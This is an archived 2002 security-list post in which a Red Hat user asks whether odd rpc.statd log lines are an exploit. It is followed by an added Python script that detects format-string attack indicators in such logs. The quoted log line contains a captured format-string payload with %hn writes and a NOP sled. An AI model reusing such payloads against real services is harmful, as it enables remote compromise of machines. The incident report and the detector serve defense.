Exploit in rpc.statd 0.3.3?

From: Roy Sigurd Karlsbakk (roy@karlsbakk.net)
Date: 07/08/02


From: Roy Sigurd Karlsbakk <roy@karlsbakk.net>
To: incidents@securityfocus.com
Date: Mon, 8 Jul 2002 17:10:56 +0200

hi all

The other day my PC, running Red Hat 7.3, rebooted without any apparent reason.
Checking the logs, I found the rather strange lines below, which look like
shellcode. I keep seeing quite a few of them; an hour or so before it rebooted,
I had one.

Can anyone help me out: is this an exploit? I have heard about something like
this on Debian, but not on Red Hat.

see below for the log entry

roy

Jul 8 13:11:45 roy-sin rpc.statd[739]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

-- 
Roy Sigurd Karlsbakk, Datavaktmester

Computers are like air conditioners. They stop working when you open Windows.
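A defender-side triage check for log lines of the shape quoted above, added here as an example that is not part of the original post: it parses the `rpc.statd ... gethostbyname error for` syslog line and flags the classic format-string indicators in the reported hostname (`%n`-family write directives, wide `%<width>x` padding, and a run of 0x90 NOP bytes, which syslog writes as the literal text `\220`). The two sample lines are constructed to resemble the report.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Shape of the syslog line in the report: "<ts> <host> rpc.statd[<pid>]: gethostbyname error for <name>"
STATD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"rpc\.statd\[(?P<pid>\d+)\]: gethostbyname error for (?P<name>.*)$"
)
WRITE_DIRECTIVE_RE = re.compile(r"%\d*\$?hh?n")   # %n / %hn / %hhn: printf writes a count to memory
PAD_DIRECTIVE_RE = re.compile(r"%(\d+)x")          # %<width>x: padding that steers the written count
# syslog escapes byte 0x90 (x86 NOP) as the literal text "\220"; raw bytes are matched too
NOP_SLED_RE = re.compile(r"(?:\\220|\x90){16,}")

@dataclass
class Verdict:
    suspicious: bool
    host: str
    pid: int
    reasons: List[str] = field(default_factory=list)

def classify_statd_line(line: str) -> Optional[Verdict]:
    """Return None for lines that are not rpc.statd gethostbyname errors,
    otherwise a Verdict listing format-string attack indicators found in the name."""
    m = STATD_RE.match(line)
    if m is None:
        return None
    name = m.group("name")
    reasons = []
    writes = WRITE_DIRECTIVE_RE.findall(name)
    if writes:
        reasons.append(f"{len(writes)} %n-family write directive(s)")
    widths = [int(w) for w in PAD_DIRECTIVE_RE.findall(name)]
    if widths:
        reasons.append(f"{len(widths)} %<width>x directive(s), max width {max(widths)}")
    sled = NOP_SLED_RE.search(name)
    if sled:
        nops = len(sled.group().replace("\\220", "\x90"))  # normalise escapes to one byte each
        reasons.append(f"NOP sled of {nops} bytes")
    return Verdict(bool(reasons), m.group("host"), int(m.group("pid")), reasons)

# Constructed sample lines (hypothetical host/pid, shortened payload), not copied from the report
ATTACK_LINE = ("Jul  8 13:11:45 roy-sin rpc.statd[739]: gethostbyname error for "
               "%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn" + "\\220" * 24)
BENIGN_LINE = "Jul  8 13:12:00 roy-sin rpc.statd[739]: gethostbyname error for nfsclient.example.invalid"
```

A benign lookup failure yields a Verdict with no reasons; any `%` directive or NOP run in a hostname is a strong signal, since legitimate hostnames contain neither.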



